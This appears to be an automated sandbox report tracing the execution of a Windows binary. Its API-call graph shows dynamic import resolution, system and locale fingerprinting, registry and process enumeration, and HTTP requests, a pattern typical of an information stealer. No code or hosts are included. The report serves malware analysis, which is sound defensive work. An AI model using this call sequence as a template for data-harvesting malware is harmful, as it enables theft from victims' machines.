13900 fb32b7 13899->13900 13901 fb45c0 2 API calls 13900->13901 13902 fb32d0 13901->13902 13903 fb45c0 2 API calls 13902->13903 13904 fb32e9 13903->13904 13905 fb45c0 2 API calls 13904->13905 13906 fb3302 13905->13906 13907 fb45c0 2 API calls 13906->13907 13908 fb331b 13907->13908 13909 fb45c0 2 API calls 13908->13909 13910 fb3334 13909->13910 13911 fb45c0 2 API calls 13910->13911 13912 fb334d 13911->13912 13913 fb45c0 2 API calls 13912->13913 13914 fb3366 13913->13914 13915 fb45c0 2 API calls 13914->13915 13916 fb337f 13915->13916 13917 fb45c0 2 API calls 13916->13917 13918 fb3398 13917->13918 13919 fb45c0 2 API calls 13918->13919 13920 fb33b1 13919->13920 13921 fb45c0 2 API calls 13920->13921 13922 fb33ca 13921->13922 13923 fb45c0 2 API calls 13922->13923 13924 fb33e3 13923->13924 13925 fb45c0 2 API calls 13924->13925 13926 fb33fc 13925->13926 13927 fb45c0 2 API calls 13926->13927 13928 fb3415 13927->13928 13929 fb45c0 2 API calls 13928->13929 13930 fb342e 13929->13930 13931 fb45c0 2 API calls 13930->13931 13932 fb3447 13931->13932 13933 fb45c0 2 API calls 13932->13933 13934 fb3460 13933->13934 13935 fb45c0 2 API calls 13934->13935 13936 fb3479 13935->13936 13937 fb45c0 2 API calls 13936->13937 13938 fb3492 13937->13938 13939 fb45c0 2 API calls 13938->13939 13940 fb34ab 13939->13940 13941 fb45c0 2 API calls 13940->13941 13942 fb34c4 13941->13942 13943 fb45c0 2 API calls 13942->13943 13944 fb34dd 13943->13944 13945 fb45c0 2 API calls 13944->13945 13946 fb34f6 13945->13946 13947 fb45c0 2 API calls 13946->13947 13948 fb350f 13947->13948 13949 fb45c0 2 API calls 13948->13949 13950 fb3528 13949->13950 13951 fb45c0 2 API calls 13950->13951 13952 fb3541 13951->13952 13953 fb45c0 2 API calls 13952->13953 13954 fb355a 13953->13954 13955 fb45c0 2 API calls 13954->13955 13956 fb3573 13955->13956 13957 fb45c0 2 API calls 13956->13957 13958 fb358c 13957->13958 13959 fb45c0 2 API calls 13958->13959 13960 fb35a5 13959->13960 13961 fb45c0 2 API calls 13960->13961 13962 fb35be 
13961->13962 13963 fb45c0 2 API calls 13962->13963 13964 fb35d7 13963->13964 13965 fb45c0 2 API calls 13964->13965 13966 fb35f0 13965->13966 13967 fb45c0 2 API calls 13966->13967 13968 fb3609 13967->13968 13969 fb45c0 2 API calls 13968->13969 13970 fb3622 13969->13970 13971 fb45c0 2 API calls 13970->13971 13972 fb363b 13971->13972 13973 fb45c0 2 API calls 13972->13973 13974 fb3654 13973->13974 13975 fb45c0 2 API calls 13974->13975 13976 fb366d 13975->13976 13977 fb45c0 2 API calls 13976->13977 13978 fb3686 13977->13978 13979 fb45c0 2 API calls 13978->13979 13980 fb369f 13979->13980 13981 fb45c0 2 API calls 13980->13981 13982 fb36b8 13981->13982 13983 fb45c0 2 API calls 13982->13983 13984 fb36d1 13983->13984 13985 fb45c0 2 API calls 13984->13985 13986 fb36ea 13985->13986 13987 fb45c0 2 API calls 13986->13987 13988 fb3703 13987->13988 13989 fb45c0 2 API calls 13988->13989 13990 fb371c 13989->13990 13991 fb45c0 2 API calls 13990->13991 13992 fb3735 13991->13992 13993 fb45c0 2 API calls 13992->13993 13994 fb374e 13993->13994 13995 fb45c0 2 API calls 13994->13995 13996 fb3767 13995->13996 13997 fb45c0 2 API calls 13996->13997 13998 fb3780 13997->13998 13999 fb45c0 2 API calls 13998->13999 14000 fb3799 13999->14000 14001 fb45c0 2 API calls 14000->14001 14002 fb37b2 14001->14002 14003 fb45c0 2 API calls 14002->14003 14004 fb37cb 14003->14004 14005 fb45c0 2 API calls 14004->14005 14006 fb37e4 14005->14006 14007 fb45c0 2 API calls 14006->14007 14008 fb37fd 14007->14008 14009 fb45c0 2 API calls 14008->14009 14010 fb3816 14009->14010 14011 fb45c0 2 API calls 14010->14011 14012 fb382f 14011->14012 14013 fb45c0 2 API calls 14012->14013 14014 fb3848 14013->14014 14015 fb45c0 2 API calls 14014->14015 14016 fb3861 14015->14016 14017 fb45c0 2 API calls 14016->14017 14018 fb387a 14017->14018 14019 fb45c0 2 API calls 14018->14019 14020 fb3893 14019->14020 14021 fb45c0 2 API calls 14020->14021 14022 fb38ac 14021->14022 14023 fb45c0 2 API calls 14022->14023 14024 fb38c5 14023->14024 
14025 fb45c0 2 API calls 14024->14025 14026 fb38de 14025->14026 14027 fb45c0 2 API calls 14026->14027 14028 fb38f7 14027->14028 14029 fb45c0 2 API calls 14028->14029 14030 fb3910 14029->14030 14031 fb45c0 2 API calls 14030->14031 14032 fb3929 14031->14032 14033 fb45c0 2 API calls 14032->14033 14034 fb3942 14033->14034 14035 fb45c0 2 API calls 14034->14035 14036 fb395b 14035->14036 14037 fb45c0 2 API calls 14036->14037 14038 fb3974 14037->14038 14039 fb45c0 2 API calls 14038->14039 14040 fb398d 14039->14040 14041 fb45c0 2 API calls 14040->14041 14042 fb39a6 14041->14042 14043 fb45c0 2 API calls 14042->14043 14044 fb39bf 14043->14044 14045 fb45c0 2 API calls 14044->14045 14046 fb39d8 14045->14046 14047 fb45c0 2 API calls 14046->14047 14048 fb39f1 14047->14048 14049 fb45c0 2 API calls 14048->14049 14050 fb3a0a 14049->14050 14051 fb45c0 2 API calls 14050->14051 14052 fb3a23 14051->14052 14053 fb45c0 2 API calls 14052->14053 14054 fb3a3c 14053->14054 14055 fb45c0 2 API calls 14054->14055 14056 fb3a55 14055->14056 14057 fb45c0 2 API calls 14056->14057 14058 fb3a6e 14057->14058 14059 fb45c0 2 API calls 14058->14059 14060 fb3a87 14059->14060 14061 fb45c0 2 API calls 14060->14061 14062 fb3aa0 14061->14062 14063 fb45c0 2 API calls 14062->14063 14064 fb3ab9 14063->14064 14065 fb45c0 2 API calls 14064->14065 14066 fb3ad2 14065->14066 14067 fb45c0 2 API calls 14066->14067 14068 fb3aeb 14067->14068 14069 fb45c0 2 API calls 14068->14069 14070 fb3b04 14069->14070 14071 fb45c0 2 API calls 14070->14071 14072 fb3b1d 14071->14072 14073 fb45c0 2 API calls 14072->14073 14074 fb3b36 14073->14074 14075 fb45c0 2 API calls 14074->14075 14076 fb3b4f 14075->14076 14077 fb45c0 2 API calls 14076->14077 14078 fb3b68 14077->14078 14079 fb45c0 2 API calls 14078->14079 14080 fb3b81 14079->14080 14081 fb45c0 2 API calls 14080->14081 14082 fb3b9a 14081->14082 14083 fb45c0 2 API calls 14082->14083 14084 fb3bb3 14083->14084 14085 fb45c0 2 API calls 14084->14085 14086 fb3bcc 14085->14086 14087 fb45c0 2 
API calls 14086->14087 14088 fb3be5 14087->14088 14089 fb45c0 2 API calls 14088->14089 14090 fb3bfe 14089->14090 14091 fb45c0 2 API calls 14090->14091 14092 fb3c17 14091->14092 14093 fb45c0 2 API calls 14092->14093 14094 fb3c30 14093->14094 14095 fb45c0 2 API calls 14094->14095 14096 fb3c49 14095->14096 14097 fb45c0 2 API calls 14096->14097 14098 fb3c62 14097->14098 14099 fb45c0 2 API calls 14098->14099 14100 fb3c7b 14099->14100 14101 fb45c0 2 API calls 14100->14101 14102 fb3c94 14101->14102 14103 fb45c0 2 API calls 14102->14103 14104 fb3cad 14103->14104 14105 fb45c0 2 API calls 14104->14105 14106 fb3cc6 14105->14106 14107 fb45c0 2 API calls 14106->14107 14108 fb3cdf 14107->14108 14109 fb45c0 2 API calls 14108->14109 14110 fb3cf8 14109->14110 14111 fb45c0 2 API calls 14110->14111 14112 fb3d11 14111->14112 14113 fb45c0 2 API calls 14112->14113 14114 fb3d2a 14113->14114 14115 fb45c0 2 API calls 14114->14115 14116 fb3d43 14115->14116 14117 fb45c0 2 API calls 14116->14117 14118 fb3d5c 14117->14118 14119 fb45c0 2 API calls 14118->14119 14120 fb3d75 14119->14120 14121 fb45c0 2 API calls 14120->14121 14122 fb3d8e 14121->14122 14123 fb45c0 2 API calls 14122->14123 14124 fb3da7 14123->14124 14125 fb45c0 2 API calls 14124->14125 14126 fb3dc0 14125->14126 14127 fb45c0 2 API calls 14126->14127 14128 fb3dd9 14127->14128 14129 fb45c0 2 API calls 14128->14129 14130 fb3df2 14129->14130 14131 fb45c0 2 API calls 14130->14131 14132 fb3e0b 14131->14132 14133 fb45c0 2 API calls 14132->14133 14134 fb3e24 14133->14134 14135 fb45c0 2 API calls 14134->14135 14136 fb3e3d 14135->14136 14137 fb45c0 2 API calls 14136->14137 14138 fb3e56 14137->14138 14139 fb45c0 2 API calls 14138->14139 14140 fb3e6f 14139->14140 14141 fb45c0 2 API calls 14140->14141 14142 fb3e88 14141->14142 14143 fb45c0 2 API calls 14142->14143 14144 fb3ea1 14143->14144 14145 fb45c0 2 API calls 14144->14145 14146 fb3eba 14145->14146 14147 fb45c0 2 API calls 14146->14147 14148 fb3ed3 14147->14148 14149 fb45c0 2 API calls 
14148->14149 14150 fb3eec 14149->14150 14151 fb45c0 2 API calls 14150->14151 14152 fb3f05 14151->14152 14153 fb45c0 2 API calls 14152->14153 14154 fb3f1e 14153->14154 14155 fb45c0 2 API calls 14154->14155 14156 fb3f37 14155->14156 14157 fb45c0 2 API calls 14156->14157 14158 fb3f50 14157->14158 14159 fb45c0 2 API calls 14158->14159 14160 fb3f69 14159->14160 14161 fb45c0 2 API calls 14160->14161 14162 fb3f82 14161->14162 14163 fb45c0 2 API calls 14162->14163 14164 fb3f9b 14163->14164 14165 fb45c0 2 API calls 14164->14165 14166 fb3fb4 14165->14166 14167 fb45c0 2 API calls 14166->14167 14168 fb3fcd 14167->14168 14169 fb45c0 2 API calls 14168->14169 14170 fb3fe6 14169->14170 14171 fb45c0 2 API calls 14170->14171 14172 fb3fff 14171->14172 14173 fb45c0 2 API calls 14172->14173 14174 fb4018 14173->14174 14175 fb45c0 2 API calls 14174->14175 14176 fb4031 14175->14176 14177 fb45c0 2 API calls 14176->14177 14178 fb404a 14177->14178 14179 fb45c0 2 API calls 14178->14179 14180 fb4063 14179->14180 14181 fb45c0 2 API calls 14180->14181 14182 fb407c 14181->14182 14183 fb45c0 2 API calls 14182->14183 14184 fb4095 14183->14184 14185 fb45c0 2 API calls 14184->14185 14186 fb40ae 14185->14186 14187 fb45c0 2 API calls 14186->14187 14188 fb40c7 14187->14188 14189 fb45c0 2 API calls 14188->14189 14190 fb40e0 14189->14190 14191 fb45c0 2 API calls 14190->14191 14192 fb40f9 14191->14192 14193 fb45c0 2 API calls 14192->14193 14194 fb4112 14193->14194 14195 fb45c0 2 API calls 14194->14195 14196 fb412b 14195->14196 14197 fb45c0 2 API calls 14196->14197 14198 fb4144 14197->14198 14199 fb45c0 2 API calls 14198->14199 14200 fb415d 14199->14200 14201 fb45c0 2 API calls 14200->14201 14202 fb4176 14201->14202 14203 fb45c0 2 API calls 14202->14203 14204 fb418f 14203->14204 14205 fb45c0 2 API calls 14204->14205 14206 fb41a8 14205->14206 14207 fb45c0 2 API calls 14206->14207 14208 fb41c1 14207->14208 14209 fb45c0 2 API calls 14208->14209 14210 fb41da 14209->14210 14211 fb45c0 2 API calls 14210->14211 
14212 fb41f3 14211->14212 14213 fb45c0 2 API calls 14212->14213 14214 fb420c 14213->14214 14215 fb45c0 2 API calls 14214->14215 14216 fb4225 14215->14216 14217 fb45c0 2 API calls 14216->14217 14218 fb423e 14217->14218 14219 fb45c0 2 API calls 14218->14219 14220 fb4257 14219->14220 14221 fb45c0 2 API calls 14220->14221 14222 fb4270 14221->14222 14223 fb45c0 2 API calls 14222->14223 14224 fb4289 14223->14224 14225 fb45c0 2 API calls 14224->14225 14226 fb42a2 14225->14226 14227 fb45c0 2 API calls 14226->14227 14228 fb42bb 14227->14228 14229 fb45c0 2 API calls 14228->14229 14230 fb42d4 14229->14230 14231 fb45c0 2 API calls 14230->14231 14232 fb42ed 14231->14232 14233 fb45c0 2 API calls 14232->14233 14234 fb4306 14233->14234 14235 fb45c0 2 API calls 14234->14235 14236 fb431f 14235->14236 14237 fb45c0 2 API calls 14236->14237 14238 fb4338 14237->14238 14239 fb45c0 2 API calls 14238->14239 14240 fb4351 14239->14240 14241 fb45c0 2 API calls 14240->14241 14242 fb436a 14241->14242 14243 fb45c0 2 API calls 14242->14243 14244 fb4383 14243->14244 14245 fb45c0 2 API calls 14244->14245 14246 fb439c 14245->14246 14247 fb45c0 2 API calls 14246->14247 14248 fb43b5 14247->14248 14249 fb45c0 2 API calls 14248->14249 14250 fb43ce 14249->14250 14251 fb45c0 2 API calls 14250->14251 14252 fb43e7 14251->14252 14253 fb45c0 2 API calls 14252->14253 14254 fb4400 14253->14254 14255 fb45c0 2 API calls 14254->14255 14256 fb4419 14255->14256 14257 fb45c0 2 API calls 14256->14257 14258 fb4432 14257->14258 14259 fb45c0 2 API calls 14258->14259 14260 fb444b 14259->14260 14261 fb45c0 2 API calls 14260->14261 14262 fb4464 14261->14262 14263 fb45c0 2 API calls 14262->14263 14264 fb447d 14263->14264 14265 fb45c0 2 API calls 14264->14265 14266 fb4496 14265->14266 14267 fb45c0 2 API calls 14266->14267 14268 fb44af 14267->14268 14269 fb45c0 2 API calls 14268->14269 14270 fb44c8 14269->14270 14271 fb45c0 2 API calls 14270->14271 14272 fb44e1 14271->14272 14273 fb45c0 2 API calls 14272->14273 14274 fb44fa 
14273->14274 14275 fb45c0 2 API calls 14274->14275 14276 fb4513 14275->14276 14277 fb45c0 2 API calls 14276->14277 14278 fb452c 14277->14278 14279 fb45c0 2 API calls 14278->14279 14280 fb4545 14279->14280 14281 fb45c0 2 API calls 14280->14281 14282 fb455e 14281->14282 14283 fb45c0 2 API calls 14282->14283 14284 fb4577 14283->14284 14285 fb45c0 2 API calls 14284->14285 14286 fb4590 14285->14286 14287 fb45c0 2 API calls 14286->14287 14288 fb45a9 14287->14288 14289 fc9c10 14288->14289 14290 fca036 8 API calls 14289->14290 14291 fc9c20 43 API calls 14289->14291 14292 fca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14290->14292 14293 fca146 14290->14293 14291->14290 14292->14293 14294 fca216 14293->14294 14295 fca153 8 API calls 14293->14295 14296 fca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14294->14296 14297 fca298 14294->14297 14295->14294 14296->14297 14298 fca2a5 6 API calls 14297->14298 14299 fca337 14297->14299 14298->14299 14300 fca41f 14299->14300 14301 fca344 9 API calls 14299->14301 14302 fca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14300->14302 14303 fca4a2 14300->14303 14301->14300 14302->14303 14304 fca4dc 14303->14304 14305 fca4ab GetProcAddress GetProcAddress 14303->14305 14306 fca515 14304->14306 14307 fca4e5 GetProcAddress GetProcAddress 14304->14307 14305->14304 14308 fca612 14306->14308 14309 fca522 10 API calls 14306->14309 14307->14306 14310 fca67d 14308->14310 14311 fca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14308->14311 14309->14308 14312 fca69e 14310->14312 14313 fca686 GetProcAddress 14310->14313 14311->14310 14314 fc5ca3 14312->14314 14315 fca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14312->14315 14313->14312 14316 fb1590 14314->14316 14315->14314 15437 fb1670 14316->15437 14319 fca7a0 lstrcpy 14320 fb15b5 14319->14320 14321 fca7a0 lstrcpy 14320->14321 14322 fb15c7 14321->14322 14323 fca7a0 
lstrcpy 14322->14323 14324 fb15d9 14323->14324 14325 fca7a0 lstrcpy 14324->14325 14326 fb1663 14325->14326 14327 fc5510 14326->14327 14328 fc5521 14327->14328 14329 fca820 2 API calls 14328->14329 14330 fc552e 14329->14330 14331 fca820 2 API calls 14330->14331 14332 fc553b 14331->14332 14333 fca820 2 API calls 14332->14333 14334 fc5548 14333->14334 14335 fca740 lstrcpy 14334->14335 14336 fc5555 14335->14336 14337 fca740 lstrcpy 14336->14337 14338 fc5562 14337->14338 14339 fca740 lstrcpy 14338->14339 14340 fc556f 14339->14340 14341 fca740 lstrcpy 14340->14341 14352 fc557c 14341->14352 14342 fc5643 StrCmpCA 14342->14352 14343 fc56a0 StrCmpCA 14344 fc57dc 14343->14344 14343->14352 14345 fca8a0 lstrcpy 14344->14345 14347 fc57e8 14345->14347 14346 fb1590 lstrcpy 14346->14352 14348 fca820 2 API calls 14347->14348 14349 fc57f6 14348->14349 14353 fca820 2 API calls 14349->14353 14350 fc5856 StrCmpCA 14350->14352 14354 fc5991 14350->14354 14351 fca7a0 lstrcpy 14351->14352 14352->14342 14352->14343 14352->14346 14352->14350 14352->14351 14359 fca820 lstrlen lstrcpy 14352->14359 14361 fc51f0 20 API calls 14352->14361 14363 fc5a0b StrCmpCA 14352->14363 14366 fca740 lstrcpy 14352->14366 14369 fca8a0 lstrcpy 14352->14369 14375 fc52c0 25 API calls 14352->14375 14378 fc578a StrCmpCA 14352->14378 14380 fc593f StrCmpCA 14352->14380 14356 fc5805 14353->14356 14355 fca8a0 lstrcpy 14354->14355 14357 fc599d 14355->14357 14358 fb1670 lstrcpy 14356->14358 14360 fca820 2 API calls 14357->14360 14381 fc5811 14358->14381 14359->14352 14362 fc59ab 14360->14362 14361->14352 14367 fca820 2 API calls 14362->14367 14364 fc5a28 14363->14364 14365 fc5a16 Sleep 14363->14365 14368 fca8a0 lstrcpy 14364->14368 14365->14352 14366->14352 14370 fc59ba 14367->14370 14371 fc5a34 14368->14371 14369->14352 14372 fb1670 lstrcpy 14370->14372 14373 fca820 2 API calls 14371->14373 14372->14381 14374 fc5a43 14373->14374 14376 fca820 2 API calls 14374->14376 14375->14352 14377 fc5a52 14376->14377 14379 fb1670 
lstrcpy 14377->14379 14378->14352 14379->14381 14380->14352 14381->13434 14383 fc754c 14382->14383 14384 fc7553 GetVolumeInformationA 14382->14384 14383->14384 14388 fc7591 14384->14388 14385 fc75fc GetProcessHeap RtlAllocateHeap 14386 fc7628 wsprintfA 14385->14386 14387 fc7619 14385->14387 14390 fca740 lstrcpy 14386->14390 14389 fca740 lstrcpy 14387->14389 14388->14385 14391 fc5da7 14389->14391 14390->14391 14391->13455 14393 fca7a0 lstrcpy 14392->14393 14394 fb4899 14393->14394 15446 fb47b0 14394->15446 14396 fb48a5 14397 fca740 lstrcpy 14396->14397 14398 fb48d7 14397->14398 14399 fca740 lstrcpy 14398->14399 14400 fb48e4 14399->14400 14401 fca740 lstrcpy 14400->14401 14402 fb48f1 14401->14402 14403 fca740 lstrcpy 14402->14403 14404 fb48fe 14403->14404 14405 fca740 lstrcpy 14404->14405 14406 fb490b InternetOpenA StrCmpCA 14405->14406 14407 fb4944 14406->14407 14408 fb4ecb InternetCloseHandle 14407->14408 15452 fc8b60 14407->15452 14410 fb4ee8 14408->14410 15467 fb9ac0 CryptStringToBinaryA 14410->15467 14411 fb4963 15460 fca920 14411->15460 14414 fb4976 14416 fca8a0 lstrcpy 14414->14416 14421 fb497f 14416->14421 14417 fca820 2 API calls 14418 fb4f05 14417->14418 14420 fca9b0 4 API calls 14418->14420 14419 fb4f27 ctype 14423 fca7a0 lstrcpy 14419->14423 14422 fb4f1b 14420->14422 14425 fca9b0 4 API calls 14421->14425 14424 fca8a0 lstrcpy 14422->14424 14436 fb4f57 14423->14436 14424->14419 14426 fb49a9 14425->14426 14427 fca8a0 lstrcpy 14426->14427 14428 fb49b2 14427->14428 14429 fca9b0 4 API calls 14428->14429 14430 fb49d1 14429->14430 14431 fca8a0 lstrcpy 14430->14431 14432 fb49da 14431->14432 14433 fca920 3 API calls 14432->14433 14434 fb49f8 14433->14434 14435 fca8a0 lstrcpy 14434->14435 14437 fb4a01 14435->14437 14436->13458 14438 fca9b0 4 API calls 14437->14438 14439 fb4a20 14438->14439 14440 fca8a0 lstrcpy 14439->14440 14441 fb4a29 14440->14441 14442 fca9b0 4 API calls 14441->14442 14443 fb4a48 14442->14443 14444 fca8a0 lstrcpy 14443->14444 14445 fb4a51 
14444->14445 14446 fca9b0 4 API calls 14445->14446 14447 fb4a7d 14446->14447 14448 fca920 3 API calls 14447->14448 14449 fb4a84 14448->14449 14450 fca8a0 lstrcpy 14449->14450 14451 fb4a8d 14450->14451 14452 fb4aa3 InternetConnectA 14451->14452 14452->14408 14453 fb4ad3 HttpOpenRequestA 14452->14453 14455 fb4b28 14453->14455 14456 fb4ebe InternetCloseHandle 14453->14456 14457 fca9b0 4 API calls 14455->14457 14456->14408 14458 fb4b3c 14457->14458 14459 fca8a0 lstrcpy 14458->14459 14460 fb4b45 14459->14460 14461 fca920 3 API calls 14460->14461 14462 fb4b63 14461->14462 14463 fca8a0 lstrcpy 14462->14463 14464 fb4b6c 14463->14464 14465 fca9b0 4 API calls 14464->14465 14466 fb4b8b 14465->14466 14467 fca8a0 lstrcpy 14466->14467 14468 fb4b94 14467->14468 14469 fca9b0 4 API calls 14468->14469 14470 fb4bb5 14469->14470 14471 fca8a0 lstrcpy 14470->14471 14472 fb4bbe 14471->14472 14473 fca9b0 4 API calls 14472->14473 14474 fb4bde 14473->14474 14475 fca8a0 lstrcpy 14474->14475 14476 fb4be7 14475->14476 14477 fca9b0 4 API calls 14476->14477 14478 fb4c06 14477->14478 14479 fca8a0 lstrcpy 14478->14479 14480 fb4c0f 14479->14480 14481 fca920 3 API calls 14480->14481 14482 fb4c2d 14481->14482 14483 fca8a0 lstrcpy 14482->14483 14484 fb4c36 14483->14484 14485 fca9b0 4 API calls 14484->14485 14486 fb4c55 14485->14486 14487 fca8a0 lstrcpy 14486->14487 14488 fb4c5e 14487->14488 14489 fca9b0 4 API calls 14488->14489 14490 fb4c7d 14489->14490 14491 fca8a0 lstrcpy 14490->14491 14492 fb4c86 14491->14492 14493 fca920 3 API calls 14492->14493 14494 fb4ca4 14493->14494 14495 fca8a0 lstrcpy 14494->14495 14496 fb4cad 14495->14496 14497 fca9b0 4 API calls 14496->14497 14498 fb4ccc 14497->14498 14499 fca8a0 lstrcpy 14498->14499 14500 fb4cd5 14499->14500 14501 fca9b0 4 API calls 14500->14501 14502 fb4cf6 14501->14502 14503 fca8a0 lstrcpy 14502->14503 14504 fb4cff 14503->14504 14505 fca9b0 4 API calls 14504->14505 14506 fb4d1f 14505->14506 14507 fca8a0 lstrcpy 14506->14507 14508 fb4d28 14507->14508 
14509 fca9b0 4 API calls 14508->14509 14510 fb4d47 14509->14510 14511 fca8a0 lstrcpy 14510->14511 14512 fb4d50 14511->14512 14513 fca920 3 API calls 14512->14513 14514 fb4d6e 14513->14514 14515 fca8a0 lstrcpy 14514->14515 14516 fb4d77 14515->14516 14517 fca740 lstrcpy 14516->14517 14518 fb4d92 14517->14518 14519 fca920 3 API calls 14518->14519 14520 fb4db3 14519->14520 14521 fca920 3 API calls 14520->14521 14522 fb4dba 14521->14522 14523 fca8a0 lstrcpy 14522->14523 14524 fb4dc6 14523->14524 14525 fb4de7 lstrlen 14524->14525 14526 fb4dfa 14525->14526 14527 fb4e03 lstrlen 14526->14527 15466 fcaad0 14527->15466 14529 fb4e13 HttpSendRequestA 14530 fb4e32 InternetReadFile 14529->14530 14531 fb4e67 InternetCloseHandle 14530->14531 14536 fb4e5e 14530->14536 14533 fca800 14531->14533 14533->14456 14534 fca9b0 4 API calls 14534->14536 14535 fca8a0 lstrcpy 14535->14536 14536->14530 14536->14531 14536->14534 14536->14535 15473 fcaad0 14537->15473 14539 fc17c4 StrCmpCA 14540 fc17cf ExitProcess 14539->14540 14544 fc17d7 14539->14544 14541 fc19c2 14541->13460 14542 fc185d StrCmpCA 14542->14544 14543 fc187f StrCmpCA 14543->14544 14544->14541 14544->14542 14544->14543 14545 fc1970 StrCmpCA 14544->14545 14546 fc18f1 StrCmpCA 14544->14546 14547 fc1951 StrCmpCA 14544->14547 14548 fc1932 StrCmpCA 14544->14548 14549 fc1913 StrCmpCA 14544->14549 14550 fc18ad StrCmpCA 14544->14550 14551 fc18cf StrCmpCA 14544->14551 14552 fca820 lstrlen lstrcpy 14544->14552 14545->14544 14546->14544 14547->14544 14548->14544 14549->14544 14550->14544 14551->14544 14552->14544 14554 fca7a0 lstrcpy 14553->14554 14555 fb5979 14554->14555 14556 fb47b0 2 API calls 14555->14556 14557 fb5985 14556->14557 14558 fca740 lstrcpy 14557->14558 14559 fb59ba 14558->14559 14560 fca740 lstrcpy 14559->14560 14561 fb59c7 14560->14561 14562 fca740 lstrcpy 14561->14562 14563 fb59d4 14562->14563 14564 fca740 lstrcpy 14563->14564 14565 fb59e1 14564->14565 14566 fca740 lstrcpy 14565->14566 14567 fb59ee InternetOpenA StrCmpCA 
14566->14567 14568 fb5a1d 14567->14568 14569 fb5fc3 InternetCloseHandle 14568->14569 14570 fc8b60 3 API calls 14568->14570 14571 fb5fe0 14569->14571 14572 fb5a3c 14570->14572 14574 fb9ac0 4 API calls 14571->14574 14573 fca920 3 API calls 14572->14573 14575 fb5a4f 14573->14575 14576 fb5fe6 14574->14576 14577 fca8a0 lstrcpy 14575->14577 14578 fca820 2 API calls 14576->14578 14580 fb601f ctype 14576->14580 14582 fb5a58 14577->14582 14579 fb5ffd 14578->14579 14581 fca9b0 4 API calls 14579->14581 14584 fca7a0 lstrcpy 14580->14584 14583 fb6013 14581->14583 14586 fca9b0 4 API calls 14582->14586 14585 fca8a0 lstrcpy 14583->14585 14594 fb604f 14584->14594 14585->14580 14587 fb5a82 14586->14587 14588 fca8a0 lstrcpy 14587->14588 14589 fb5a8b 14588->14589 14590 fca9b0 4 API calls 14589->14590 14591 fb5aaa 14590->14591 14592 fca8a0 lstrcpy 14591->14592 14593 fb5ab3 14592->14593 14595 fca920 3 API calls 14593->14595 14594->13466 14596 fb5ad1 14595->14596 14597 fca8a0 lstrcpy 14596->14597 14598 fb5ada 14597->14598 14599 fca9b0 4 API calls 14598->14599 14600 fb5af9 14599->14600 14601 fca8a0 lstrcpy 14600->14601 14602 fb5b02 14601->14602 14603 fca9b0 4 API calls 14602->14603 14604 fb5b21 14603->14604 14605 fca8a0 lstrcpy 14604->14605 14606 fb5b2a 14605->14606 14607 fca9b0 4 API calls 14606->14607 14608 fb5b56 14607->14608 14609 fca920 3 API calls 14608->14609 14610 fb5b5d 14609->14610 14611 fca8a0 lstrcpy 14610->14611 14612 fb5b66 14611->14612 14613 fb5b7c InternetConnectA 14612->14613 14613->14569 14614 fb5bac HttpOpenRequestA 14613->14614 14616 fb5c0b 14614->14616 14617 fb5fb6 InternetCloseHandle 14614->14617 14618 fca9b0 4 API calls 14616->14618 14617->14569 14619 fb5c1f 14618->14619 14620 fca8a0 lstrcpy 14619->14620 14621 fb5c28 14620->14621 14622 fca920 3 API calls 14621->14622 14623 fb5c46 14622->14623 14624 fca8a0 lstrcpy 14623->14624 14625 fb5c4f 14624->14625 14626 fca9b0 4 API calls 14625->14626 14627 fb5c6e 14626->14627 14628 fca8a0 lstrcpy 14627->14628 14629 fb5c77 
[Execution graph: the rendered node/edge listing is not reproduced. Recoverable from the fragment: a string-building chain over lstrcpy, lstrlen and lstrcat with heap allocation through GetProcessHeap/RtlAllocateHeap that gathers system details via GetCurrentProcess/IsWow64Process, GetLocalTime, GetTimeZoneInformation, GetUserDefaultLocaleName (with CharToOemW), GetKeyboardLayoutList/GetLocaleInfoA, GetSystemPowerStatus, GetCurrentProcessId/OpenProcess/GetModuleFileNameExA, RegOpenKeyExA/RegQueryValueExA/RegEnumKeyExA/RegCloseKey, GetLogicalProcessorInformationEx, GetSystemInfo, GlobalMemoryStatusEx, GetSystemTime and CreateToolhelp32Snapshot/Process32First/Process32Next; string/binary conversion through CryptBinaryToStringA and CryptStringToBinaryA; string comparisons through StrCmpCA; network I/O through InternetOpenA, InternetConnectA, InternetCrackUrlA, InternetOpenUrlA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle; and a loader path using VirtualAlloc, LoadLibraryA, GetProcAddress, VirtualFree and FreeLibrary.]

Control-flow Graph

Basic blocks (the Executed / Not Executed colouring of the rendered graph is not reproduced):
• 660: fc9860-fc9874, call fc9750 -> 663, 664
• 663: fc987a-fc9a8e, call fc9780, GetProcAddress × 21 -> 664
• 664: fc9a93-fc9af2, LoadLibraryA × 5 -> 666, 667
• 667: fc9af4-fc9b08, GetProcAddress -> 666
• 666: fc9b0d-fc9b14 -> 669, 670
• 670: fc9b16-fc9b41, GetProcAddress × 2 -> 669
• 669: fc9b46-fc9b4d -> 671, 672
• 671: fc9b4f-fc9b63, GetProcAddress -> 672
• 672: fc9b68-fc9b6f -> 673, 674
• 674: fc9b71-fc9b84, GetProcAddress -> 673
• 673: fc9b89-fc9b90 -> 675, 676
• 676: fc9b92-fc9bbc, GetProcAddress × 2 -> 675
• 675: fc9bc1-fc9bc2
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00C82320), ref: 00FC98A1
                  • GetProcAddress.KERNEL32(74DD0000,00C823E0), ref: 00FC98BA
                  • GetProcAddress.KERNEL32(74DD0000,00C82440), ref: 00FC98D2
                  • GetProcAddress.KERNEL32(74DD0000,00C82218), ref: 00FC98EA
                  • GetProcAddress.KERNEL32(74DD0000,00C82350), ref: 00FC9903
                  • GetProcAddress.KERNEL32(74DD0000,00C88FD8), ref: 00FC991B
                  • GetProcAddress.KERNEL32(74DD0000,00C75DF0), ref: 00FC9933
                  • GetProcAddress.KERNEL32(74DD0000,00C75AF0), ref: 00FC994C
                  • GetProcAddress.KERNEL32(74DD0000,00C823B0), ref: 00FC9964
                  • GetProcAddress.KERNEL32(74DD0000,00C824E8), ref: 00FC997C
                  • GetProcAddress.KERNEL32(74DD0000,00C82500), ref: 00FC9995
                  • GetProcAddress.KERNEL32(74DD0000,00C823F8), ref: 00FC99AD
                  • GetProcAddress.KERNEL32(74DD0000,00C75AD0), ref: 00FC99C5
